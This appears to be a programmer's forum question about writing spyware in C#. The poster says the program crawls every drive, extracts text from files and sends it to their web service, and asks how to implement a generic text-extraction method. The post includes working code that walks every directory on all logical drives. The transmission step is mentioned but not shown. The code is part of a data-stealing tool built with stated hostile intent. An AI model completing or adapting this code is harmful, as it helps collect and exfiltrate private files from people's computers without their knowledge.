I'm creating a spyware program that craws the entire file system of a computer and looks for any text that it can find and sends it to my accompanying web service. The problem I'm having is, once I have a file, it is either a type of file from which I can extract text (i.e. if it's a .txt., .docx, .xml, etc. file) or it's not. If it is, I want to extract the text from it. What I have right now is
    private string _accumulatedInfo;
    public FileCrawler ( )
    {
        this._accumulatedInfo = String.Empty;
    }
    private void GrabInfo ( System.IO.FileInfo fi )
    {
        // if can parse text out of file, add text to accumulated info string
        // ... 
    }
    private void _WalkDirectoryTree ( System.IO.DirectoryInfo root )
    {
        System.IO.FileInfo[] files = root.GetFiles("*.*");
        if ( files != null )
        {
            foreach ( System.IO.FileInfo fi in files )
            {
                GrabInfo(fi);   
            }
        }
        System.IO.DirectoryInfo[] subDirs = root.GetDirectories();
        if ( subDirs != null )
        {
            foreach ( System.IO.DirectoryInfo dirInfo in subDirs )
            {
                this._WalkDirectoryTree(dirInfo);
            }
        }
    }
    private void CrawlAllDrives ( )
    {
        string[] drives = System.Environment.GetLogicalDrives();
        foreach ( string dr in drives )
        {
            System.IO.DriveInfo di = new System.IO.DriveInfo(dr);
            if ( di.IsReady )
            {
                System.IO.DirectoryInfo rootDir = di.RootDirectory;
                this._WalkDirectoryTree(rootDir);
            }
        }
    }
and I'm wondering how to, or whether it's even possible to, implement my
    private void GrabInfo ( System.IO.FileInfo fi )
    {
        // if can parse text out of file, add text to accumulated info string
        // ... 
    }
method without resorting to something like
    private void GrabInfo ( System.IO.FileInfo fi )
    {
        switch (fi.Extension)
        {
             case "txt":
                // ... 
             case "docx":
                // ...
             // ... 
        }
    }
Does there exist some generic way of extracting text from a file?
 
     
    